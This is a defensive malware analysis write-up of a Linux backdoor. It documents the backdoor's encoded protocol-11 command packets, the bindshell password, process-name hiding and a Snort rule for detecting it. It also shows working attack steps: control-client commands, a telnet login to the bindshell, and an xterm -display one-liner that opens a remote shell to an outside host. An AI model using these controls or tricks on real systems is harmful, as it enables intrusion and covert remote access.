The Reverse Engineering Compiler
REC was used to decompile the-binary into C-like structured code, which made the program structure easier to identify.
Can be used to regenerate the symbol table of a stripped ELF binary, and do a lot of other reverse engineering tasks.
User Mode Linux
A reasonably safe environment for running and tracing the-binary.
To monitor network traffic to and from the-binary, and analyse the DDOS functions.
To generate packets to send to the-binary to verify functionality.
To capture response packets from the-binary.
A rule for the Snort Network Intrusion Detection System (NIDS) was created to detect control traffic for this binary, and others like it.
The-binary was disassembled with objdump and REC under a standard RedHat Linux 7.1 install. C source was developed on the host using the libnet and libpcap libraries, in order to exercise the functionality of the-binary. User Mode Linux was installed to provide an environment for executing the-binary.
The-binary was tested under User Mode Linux (UML) using a virtual network in the address range 192.168.32.0/24. The infected host was configured as 192.168.32.200. The client sent its probes from the real host, and tcpdump also ran on the real host. The-binary was largely disassembled before the first test run. This gave some assurance that it would not detect UML and attempt to exploit it to escape to the host OS, or perform other malicious actions. The initial disassembly was also needed to determine the packet contents the-binary was expecting.
The standard User Mode Linux Debian Minimal and RedHat 7.2 full install drive images were used to provide virtual systems for running and communicating with the-binary.
The host machine on which UML was run did not have any other active network interfaces, to prevent packets slipping out onto public networks.
This environment was designed to prevent network activity from the infected host from escaping beyond the host running the UML system.
Having downloaded the-binary.tar.gz from project.honeynet.org, I verified the MD5 checksum of the archive with the md5sum command, and it matched that shown on the web site.
The Unix file(1) command was used to identify the binary as a statically linked Linux i386 executable. strings(1) was used to examine the-binary for clues as to its purpose and composition. strings revealed that the-binary was probably linked against "The Linux C library 5.3.12", containing "yplib.c,v 2.6 1994/05/27". This library was present in RedHat Linux 6.2, but not RedHat Linux 6.1 or 7.0, so if this program was linked under RedHat, it was probably under RedHat 6.2. Also present are strings indicating that /bin/csh may be used to execute commands, and that /tmp/.hj237349 may be used at some point.
I ran "objdump -dS the-binary" to get a raw disassembly of the-binary for reference when REC did not produce the level of detail required.
I ran REC against the-binary to begin identifying its functions and structure.
Initial disassembly with the Reverse Engineering Compiler (REC) revealed many functions containing the "int 0x80" instruction. Programs running under Linux use this software interrupt to invoke kernel functions, called system calls, with the system call number in EAX.
There is a list of Linux system calls in /usr/include/asm/unistd.h. I wanted to determine the likely purpose of the functions in the REC output. To do this, I wrote a Perl script that searches the REC output for lines where EAX is set, followed by an int 0x80. It then labels the interrupt with the matching system call name from unistd.h. This script is convert-syscall.pl in files.tar.
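The same idea can be shown as a minimal C sketch. It is not the author's script. It assumes REC prints an immediate load as a line containing `eax = <number>` and the trap as a line containing `int 0x80`; the real REC output format may differ. Only a handful of i386 numbers from unistd.h are included. The names `syscall_name()` and `annotate()` are hypothetical.

```c
#include <stdlib.h>
#include <string.h>

/* A few i386 system call numbers from /usr/include/asm/unistd.h.
 * A complete tool would load the whole table from that header. */
static const struct {
    long nr;
    const char *name;
} syscall_table[] = {
    {1, "exit"},  {2, "fork"},     {3, "read"},    {4, "write"},
    {5, "open"},  {6, "close"},    {11, "execve"}, {20, "getpid"},
    {37, "kill"}, {102, "socketcall"}, {114, "wait4"},
};

/* Map a system call number to its name, or "?" if it is not in the table. */
const char *syscall_name(long nr)
{
    size_t i;
    for (i = 0; i < sizeof syscall_table / sizeof syscall_table[0]; i++)
        if (syscall_table[i].nr == nr)
            return syscall_table[i].name;
    return "?";
}

/* Process one line of disassembly (assumed format, see above).
 * *eax holds the last immediate loaded into EAX, or -1 if unknown.
 * Returns a system call name for an "int 0x80" line, otherwise NULL. */
const char *annotate(const char *line, long *eax)
{
    const char *p = strstr(line, "eax = ");
    if (p != NULL) {
        char *end;
        long v = strtol(p + 6, &end, 0);  /* base 0 accepts 0x.. and decimal */
        *eax = (end != p + 6) ? v : -1;   /* register copy: value unknown */
        return NULL;
    }
    if (strstr(line, "int 0x80") != NULL)
        return (*eax >= 0) ? syscall_name(*eax) : "?";
    return NULL;
}
```

A driver would read the REC output with fgets(), call annotate() on each line, and print the returned name next to each interrupt.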
Once I had determined the names of some of the library functions within
the REC output, I added them to my REC command file. The argument lists
for these functions came from their C header files in /usr/include/. At
this point, my REC command file looked something like this:
    #!wrec
    file: the-binary
    cpu: i386
    option: +hexconst
    region: 0x000090 0x01f5d0 0x08048090 text
    region: 0x01f5d8 0x024228 0x080675d8 data
    region: 0x024228 0x0302ac 0x0806d228 data
    ##############################
    # Standard library functions #
    ##############################
    symbol: 0x0804F620, 0x0804F67F T fopen(char *path, char *mode)
    # INCOMPLETE TYPE
    symbol: 0x0804F808, 0x0804F81F T sprintf(char *string, char *format)
    # INCOMPLETE TYPE
    symbol: 0x0804F820, 0x0804F884 T _IO_sprintf(char *string, char *format)
    symbol: 0x08055FBC, 0x0805602B T _exit(int n)
    symbol: 0x080569FC, 0x08056A2B T wait4(unsigned int pid, int *status, int options, void *rusage)
    symbol: 0x08056A2C, 0x08056A71 T accept(int s, void *address, unsigned int *addrlen)
    symbol: 0x08056A74, 0x08056AB9 T bind(int sockfd, void *myaddr, unsigned int addrlen)
    symbol: 0x08056ABC, 0x08056B01 T connect(int sockfd, void *serveraddr, unsigned int addrlen)
    ...
To aid in identifying and verifying further library functions, I downloaded the Linux libc 5.3.12 source and referred to it whenever I found a prospective library function.
Had I known about it, I could have avoided this time-consuming process by running dress(1) from the Fenris reverse engineering toolkit. Dress can regenerate the stripped symbol table of an ELF executable.
To find main() in the-binary, I examined the output of REC and found the ELF entry point function, labelled "__entry_point__". Reading through this standard function revealed a call to a larger function at 0x08048134, which I assumed to be main().
In main(), the lead up to the first for loop contains calls to
various functions and can be represented by the summary below:
I was interested in the encoding and decoding functions mentioned in the challenge questions. decode() was quickly found by examining the function calls following the call to recv() in main(). I looked here because you cannot do much with a command packet before decoding it. encode() was found by searching for the value 0x17 (a key value in the decode() function) in the rest of the disassembly.
The encode and decode functions are located at the following addresses:
0x0804A194-0x0804A1E6: encode(int length, unsigned char *src, unsigned char *dst)
0x0804A1E8-0x0804A2A4: decode(int length, unsigned char *src, unsigned char *dst)
Their disassembly with REC was not too hard to follow, and is included in the files I have submitted.
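For illustration only, here is a C sketch of the pair, using the signatures listed above. It assumes a chained additive cipher built around the 0x17 constant. Each encoded byte is the plaintext byte plus the previous encoded byte plus 0x17, modulo 256. Decoding subtracts the previous encoded byte and 0x17. This reconstruction is an assumption and should be checked against the submitted disassembly before being relied on.

```c
#define KEY 0x17   /* key value noted in decode() at 0x0804A1E8 */

/* Assumed encode(): dst[i] = src[i] + dst[i-1] + 0x17 (mod 256),
 * treating dst[-1] as 0. Working forwards lets src and dst overlap. */
void encode(int length, const unsigned char *src, unsigned char *dst)
{
    int i;
    for (i = 0; i < length; i++)
        dst[i] = (unsigned char)(src[i] + (i > 0 ? dst[i - 1] : 0) + KEY);
}

/* Assumed decode(): the inverse, src[i] - src[i-1] - 0x17 (mod 256).
 * Working backwards keeps src[i-1] intact if src and dst overlap. */
void decode(int length, const unsigned char *src, unsigned char *dst)
{
    int i;
    for (i = length - 1; i >= 0; i--)
        dst[i] = (unsigned char)(src[i] - (i > 0 ? src[i - 1] : 0) - KEY);
}
```

Under this assumption, every encoded byte depends on all earlier ones. Changing the first plaintext byte therefore changes the entire encoded output.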
I then examined the functions called by the goto statement shortly after the call to decode(). Some of them executed shell commands. Command 1 returned the PID of any child the server had forked, and command 2 configured the server. The code before the goto revealed the format and usage of the first 4 bytes of the packet.
Now that I knew that the-binary was a network daemon, and what some of its commands did, I ran the-binary under User Mode Linux. User Mode Linux is a Linux kernel that runs under Linux, allowing you to use a file on the host system as a disk drive containing the filesystem for UML.
When run under User Mode Linux, the-binary changes its process name, as shown by ps, to "[mingetty]". mingetty is a minimal getty program commonly found running on Linux machines, so this is an attempt to hide the-binary in the process list. The "top" command still shows the original binary name ("the-binary"), and /proc shows that the-binary has a single open socket.
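One common way for a Linux program to disguise itself like this is to overwrite its argv strings, which ps reads from /proc/<pid>/cmdline. The kernel keeps a separate short command name, which top displays from /proc/<pid>/stat. That name is not changed by this technique, which would be consistent with the difference observed above. Whether the-binary actually works this way is an assumption, and `set_cmdline()` is a hypothetical helper.

```c
#include <string.h>

/* Replace the process's visible command line with new_name.
 * Assumes the argv strings are contiguous in memory, as they are on the
 * initial stack of a Linux process. new_name is truncated if it is
 * longer than the original argument area. */
void set_cmdline(int argc, char **argv, const char *new_name)
{
    char *start = argv[0];
    char *end = argv[argc - 1] + strlen(argv[argc - 1]);  /* final NUL */
    size_t room = (size_t)(end - start);

    memset(start, 0, room);          /* wipe the old arguments */
    strncpy(start, new_name, room);  /* the NUL at *end still terminates */
}
```

A program would call `set_cmdline(argc, argv, "[mingetty]")` at the top of main().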
The-binary uses IP protocol 11 for communication. This
evades simple searches for evidence of a compromise, such as
TCP and UDP network scans by nmap, and basic interpretation of
netstat output. IP services listening for protocol 11 are shown
in the output of "netstat -an" as:
raw 0 0 0.0.0.0:11 0.0.0.0:* 7
A list of supported protocols on a machine can be found by the
nmap (http://www.insecure.org/nmap/) protocol scan, however this
could be fooled by having the back door send an ICMP protocol
unreachable packet in response to malformed command packets.
Nmap -sO outputs the following line when it detects protocol 11:
11 open nvp-ii
Using libnet and libpcap, I put together a tool to construct command packets for the-binary based on the packet format I worked out from the REC disassembly, and another to dump the packets. By throwing these packets at the-binary and observing it with gdb, I was able to work out almost all of the functionality it provides. These two tools are called pingit.c and dumpit.c, and are included in the attached archive. Running tcpdump in another window allowed me to see the DOS floods when they started.
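libnet builds the IP header for these packets. To show what that header must contain, here is a hedged sketch that fills in a 20-byte IPv4 header for protocol 11 by hand, as one would for a raw socket with IP_HDRINCL instead of libnet. It is not taken from pingit.c. `build_ip_header()` and `ip_checksum()` are hypothetical names, and the TTL and IP ID are left as parameters.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* RFC 1071 Internet checksum over len bytes, read as big-endian 16-bit
 * words. Returns the value in host byte order. */
uint16_t ip_checksum(const unsigned char *buf, size_t len)
{
    uint32_t sum = 0;
    size_t i;

    for (i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)(buf[i] << 8 | buf[i + 1]);
    if (len & 1)
        sum += (uint32_t)buf[len - 1] << 8;  /* pad odd byte with zero */
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);  /* fold carries */
    return (uint16_t)~sum;
}

/* Fill a 20-byte IPv4 header for a protocol 11 packet.
 * Addresses are in host order, e.g. 0xC0A82001 for 192.168.32.1. */
void build_ip_header(unsigned char hdr[20], uint32_t src, uint32_t dst,
                     uint16_t payload_len, uint8_t ttl, uint16_t id)
{
    uint16_t total = (uint16_t)(20 + payload_len);
    uint16_t csum;

    memset(hdr, 0, 20);
    hdr[0] = 0x45;                    /* version 4, header is 5 words */
    hdr[2] = total >> 8;  hdr[3] = total & 0xFF;
    hdr[4] = id >> 8;     hdr[5] = id & 0xFF;
    hdr[8] = ttl;
    hdr[9] = 11;                      /* IP protocol 11 */
    for (int i = 0; i < 4; i++) {
        hdr[12 + i] = (unsigned char)(src >> (24 - 8 * i));
        hdr[16 + i] = (unsigned char)(dst >> (24 - 8 * i));
    }
    csum = ip_checksum(hdr, 20);      /* computed with checksum field = 0 */
    hdr[10] = csum >> 8;  hdr[11] = csum & 0xFF;
}
```

A receiver can check such a header by running ip_checksum() over all 20 bytes. A header carrying a correct checksum yields 0.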
I rewrote pingit.c to accept parameters from the command line. This new program is called the-client, and it allows control of most aspects of packets being sent to the-binary. the-client.c is also included in the attached files. It does not support a couple of the flood request types, and does not properly receive response packets yet.
Using the REC disassembly and my tools (dumpit, pingit and the-client), I was able to determine the packet format for all 12 commands and responses.
All command and response packets have a standard IP header specifying protocol 11. The first two bytes of the data area are not encoded: an unknown byte, followed by a command/response (direction) flag. The rest of the data area is encoded using the encode() function detailed elsewhere in this analysis. The first encoded byte is ignored, and can be used to salt the encode() function so that a repeated command can have 256 different possible appearances on the wire. The next byte is the command byte, a number between 1 and 12 that specifies the function being called. The rest of the packet is data for the command.
    0x00        0x14        0x16
    +-----------+-----+-----+-----+-----+----...
    | IP Header | XXX | DIR | SLT | CMD | ARGS
    +-----------+-----+-----+-----+-----+----...

    offset
    0         IP Header
    0x14      XXX    Unknown
    0x15      DIR    Direction:
                       02 Command
                       03 Response
                       04 Response Continuation
    ------ Everything after here encoded -------------
    0x16      SLT    Salt
    0x17      CMD    Command number
    0x18...   ARGS   Variable length parameters for CMD

Example packet and response:

    command 1: status
    Accepts no parameters

    0x00        0x14      0x16
    +-----------+----+----+----+----+----...
    | IP Header | 00 | 02 | XX | 01 |
    +-----------+----+----+----+----+----...

    offset
    0x17      CMD    Command number = 1

    Returns PID of currently executing shell or flood process.

    0x00        0x14      0x16
    +-----------+----+----+----+----+-----+------+-...
    | IP Header | 00 | 02 | XX | 01 | CHL | PID  |
    +-----------+----+----+----+----+-----+------+-...

    offset
    0x17        CMD    Command number = 1
    0x18        CHL    Flag to indicate if there is a child running
                         00 = no child process
                         01 = child process
    0x19,0x1A   PID    Process ID of child process
The rest of the packet formats can be seen in the-client.c and pingit.c.
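The packet layout described above can be expressed as a small parser, sketched here under stated assumptions. It reads the header length from the IHL field rather than assuming the 20 bytes (0x14) shown in the diagram. It stops before decoding: the region starting at the salt byte would then be passed to decode(). `split_packet()` and the DIR_* names are hypothetical.

```c
#include <stddef.h>

#define PROTO_THE_BINARY 11   /* IP protocol used for control traffic */
#define DIR_COMMAND       2
#define DIR_RESPONSE      3
#define DIR_CONTINUATION  4

/* Given a raw IPv4 datagram, check that it is protocol 11 and return a
 * pointer to the encoded part (salt, command, arguments). The direction
 * byte is stored in *direction and the encoded length in *enc_len.
 * Returns NULL if the packet cannot be a the-binary packet. */
const unsigned char *split_packet(const unsigned char *pkt, size_t len,
                                  int *direction, size_t *enc_len)
{
    size_t ihl;

    if (len < 20 || (pkt[0] >> 4) != 4)
        return NULL;                       /* not IPv4 */
    ihl = (size_t)(pkt[0] & 0x0F) * 4;     /* header length in bytes */
    if (ihl < 20 || len < ihl + 2 || pkt[9] != PROTO_THE_BINARY)
        return NULL;
    /* pkt[ihl] is the unknown XXX byte; pkt[ihl + 1] is DIR */
    *direction = pkt[ihl + 1];
    *enc_len = len - (ihl + 2);
    return pkt + ihl + 2;
}
```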
Examining the REC disassembly of the bindshell function (CMD_06) reveals that a connection is accepted, the string sent by the client is compared with the value 'TfOjG', and if the strings match the remote user is dropped into a shell.
I used the-client to launch the bindshell, and checked the protocol and port
on the host running the-binary with netstat -an. A new port had been opened:
tcp 0 0 0.0.0.0:23281 0.0.0.0:* LISTEN
As it is TCP, we can use telnet to connect. I connected and tried the password 'TfOjG', but got no response. Looking at the code, the line-ending characters LF (0x0a) and CR (0x0d) are translated to '\0', so I tried a few newlines after the password, with no luck. Re-examining the disassembly revealed that the password was obfuscated: each submitted character is incremented by one before the comparison. I reconnected and tried the password 'SeNiF' followed by spaces, again with no luck. I decided to use gdb to compare the strings myself, as the-binary saw them.
The disassembly shows that the code forks twice in CMD_06. It forks once after the function is entered, so that the main loop can continue processing other commands, and again after accept() is called. This could have made interactive debugging with gdb difficult, as I had already noticed that follow-fork-mode was ineffective, possibly because the-binary was statically linked. Luckily, recv() is called just after the second fork.
As recv() blocks until it receives input, I connected to the bindshell with telnet. This brought the forked bindshell process up to the recv() call. Using ps, I found the process ID of the forked shell and fired up gdb.
    bash-2.05# ps ax | fgrep mingetty
      417 tts/0  S  0:00 /sbin/mingetty serial/0
      454 ?      S  0:00 [mingetty]
      507 ?      S  0:00 [mingetty]
      508 ?      S  0:00 [mingetty]

    (gdb) attach 508
    Attaching to process 508
    0x08056b74 in ?? ()
    (gdb) bt
    #0  0x08056b74 in ?? ()
    #1  0x080489cf in ?? ()
    #2  0x080480eb in ?? ()
    (gdb) disassemble 0x080489cf 0x08048a1b
    Dump of assembler code from 0x80489cf to 0x8048a1b:
    0x80489cf:  xor    %ebx,%ebx
    0x80489d1:  add    $0x10,%esp
    0x80489d4:  mov    0xffffbc44(%ebx,%ebp,1),%al
    0x80489db:  cmp    $0xa,%al
    0x80489dd:  je     0x80489e3
    0x80489df:  cmp    $0xd,%al
    0x80489e1:  jne    0x80489f0
    0x80489e3:  movb   $0x0,0xffffbc44(%ebx,%ebp,1)
    0x80489eb:  jmp    0x80489fe
    0x80489ed:  lea    0x0(%esi),%esi
    0x80489f0:  mov    %al,0xffffbc44(%ebx,%ebp,1)
    0x80489f7:  incb   0xffffbc44(%ebx,%ebp,1)
    0x80489fe:  inc    %ebx
    0x80489ff:  cmp    $0x12,%ebx
    0x8048a02:  jle    0x80489d4
    0x8048a04:  lea    0xffffbc44(%ebp),%esi
    0x8048a0a:  mov    $0x8067617,%edi
    0x8048a0f:  mov    $0x6,%ecx
    0x8048a14:  cld
    0x8048a15:  test   $0x0,%al
    0x8048a17:  repz cmpsb %es:(%edi),%ds:(%esi)
    0x8048a19:  je     0x8048a44
    End of assembler dump.
    (gdb) break *0x8048a0f
    Breakpoint 1 at 0x8048a0f
    (gdb) cont
    Continuing.
Typing 'SeNiF' into telnet followed by a few spaces caused the breakpoint to be hit. I then compared the password received from the network with the password stored in the binary:
    Breakpoint 1, 0x08048a0f in ?? ()
    (gdb) x/10c 0xffffbc44+$ebp
    0x9fffb7e8:  84 'T'  102 'f'  79 'O'  106 'j'  71 'G'  33 '!'  33 '!'  33 '!'
    0x9fffb7f0:  33 '!'  33 '!'
    (gdb) x/10c 0x8067617
    0x8067617:   84 'T'  102 'f'  79 'O'  106 'j'  71 'G'  0 '\000'  -1 'ÿ'  -5 'û'
    0x806761f:   1 '\001'  0 '\000'
So the password itself is correct. The problem is that 6 characters are compared while the password is only 5 characters long, so a trailing null byte is needed. As newlines are translated to null bytes, all I needed to do was press Enter after typing the password. I restarted the bindshell with the-client, reconnected with telnet and typed SeNiF followed by Enter. This worked: when I pressed Enter a second time, I got the response ": command not found".
    $ sudo ./the-client -i tap0 -s 192.168.32.1 -d 192.168.32.200 stop
    Cmd: 8 Resp?: 0 Bind?: 0 Proto: 11 Body: 400 Wait: 500 Device: tap0 ttl: 250 Unk: 0 Source: 192.168.32.1 Dest: 192.168.32.200
    $ sudo ./the-client -i tap0 -s 192.168.32.1 -d 192.168.32.200 bindshell
    Cmd: 6 Resp?: 0 Bind?: 1 Proto: 11 Body: 400 Wait: 500 Device: tap0 ttl: 250 Unk: 0 Source: 192.168.32.1 Dest: 192.168.32.200
    STUB: no bindshell support yet
    $ telnet 192.168.32.200 23281
    Trying 192.168.32.200...
    Connected to 192.168.32.200.
    Escape character is '^]'.
    SeNiF
    : command not found
    ls
    : command not found
    echo hi
    hi
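The gdb findings can be combined into a C sketch of the bindshell's password check. The 19-byte loop, the CR/LF handling, the increment and the 6-byte comparison against 0x8067617 all come from the disassembly above. Zero-filling the unused part of the buffer is an assumption, and `bindshell_password_ok()` is a hypothetical name.

```c
#include <stddef.h>
#include <string.h>

#define PW_BUF_LEN 19   /* the loop at 0x080489d4 runs while ebx <= 0x12 */

/* Mirror of the check at 0x080489cf-0x08048a19: CR and LF become NUL,
 * every other byte is incremented, then 6 bytes are compared with the
 * string at 0x8067617 ("TfOjG" plus its terminating NUL). */
int bindshell_password_ok(const unsigned char *received, size_t len)
{
    unsigned char buf[PW_BUF_LEN] = {0};  /* assumed zero-filled */
    size_t i;

    memcpy(buf, received, len < PW_BUF_LEN ? len : PW_BUF_LEN);
    for (i = 0; i < PW_BUF_LEN; i++) {
        if (buf[i] == '\n' || buf[i] == '\r')
            buf[i] = 0;
        else
            buf[i]++;
    }
    return memcmp(buf, "TfOjG", 6) == 0;
}
```

In this model, a literal NUL byte sent after the password becomes 0x01 and fails the comparison. Only CR or LF produces the terminator that the 6-byte comparison requires.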
As it turns out, the shell is pretty useless because it cannot find any non-builtin commands. This can be overcome by using xhost on an X server to allow access from the compromised host, then starting an xterm that displays on that X server. The drawback is that this gives away your IP address to the owner of the compromised system. For example:
    $ telnet 192.168.32.200 23281
    Trying 192.168.32.200...
    Connected to 192.168.32.200.
    Escape character is '^]'.
    SeNiF
    echo `/usr/X11R6/bin/xterm -display 192.168.32.254:0`
This uses the builtin echo command and backquote (``) command substitution to run a command through the bindshell.
As the-binary is controlled by packets using an unusual protocol, I decided that this was a good way to detect the network traffic related to this program and others like it. Since Snort (an Open Source network intrusion detection system) has an easy to use rule system for configuring its alerts, I decided to prototype this with Snort.
Snort is configured using rule files. The rule files list rules that can specify which packets and data flows to match, and what to tell the Snort user about those packets.
At first glance, I could not find any way to specify how to monitor for
particular IP protocols in the Snort documentation. A bit of research
uncovered the ip_proto keyword. I created and tested the rule:
    alert ip $EXTERNAL_NET any <> $HOME_NET 0 (msg:"Traffic on unusual IP protocol" ; ip_proto: !6; ip_proto: !17; ip_proto: !1; classtype:misc-activity; rev:1;)
This rule detected the traffic. I tried adding more protocols to the exclusion list, but Snort then started detecting all traffic, so I left it at that. The greater-than (>) operator does not seem to work with ip_proto, and ip_proto does not seem to accept lists. In a production environment, you would need to ignore 5 or so major protocols (TCP, UDP, ICMP, IGRP, and routing protocols such as OSPF) to cut down on false positives. Protocol numbers are assigned by IANA and are available at http://www.iana.org/assignments/protocol-numbers
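Outside Snort, the same allowlist idea can be sketched in C, for example inside a libpcap packet handler. The set of "usual" protocols is an assumption that would need tuning for each network. It contains ICMP 1, TCP 6, IGP 9 (used by Cisco for IGRP), UDP 17 and OSPF 89, all from the IANA list. `is_unusual_protocol()` and `is_unusual_packet()` are hypothetical helpers.

```c
#include <stddef.h>

/* IP protocol numbers treated as normal traffic (IANA assignments). */
static const unsigned char usual_protocols[] = {
    1,    /* ICMP */
    6,    /* TCP */
    9,    /* IGP, used by Cisco for IGRP */
    17,   /* UDP */
    89,   /* OSPF */
};

/* Return 1 if the protocol number is not in the allowlist, 0 otherwise. */
int is_unusual_protocol(unsigned char proto)
{
    size_t i;
    for (i = 0; i < sizeof usual_protocols; i++)
        if (usual_protocols[i] == proto)
            return 0;
    return 1;
}

/* Check a raw IPv4 datagram: byte 9 of the header is the protocol. */
int is_unusual_packet(const unsigned char *pkt, size_t len)
{
    return len >= 20 && is_unusual_protocol(pkt[9]);
}
```

Unlike the ip_proto exclusions in the rule, this list can be extended with further protocols without changing the matching logic.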
The-binary is a back door program. It acts as a network server, listening on IP protocol 11. Command and response packets are encoded using a simple cipher.
It provides facilities to execute shell commands using /bin/csh and /bin/sh as root on the compromised system, and the ability to launch a variety of Denial of Service (DOS) attacks.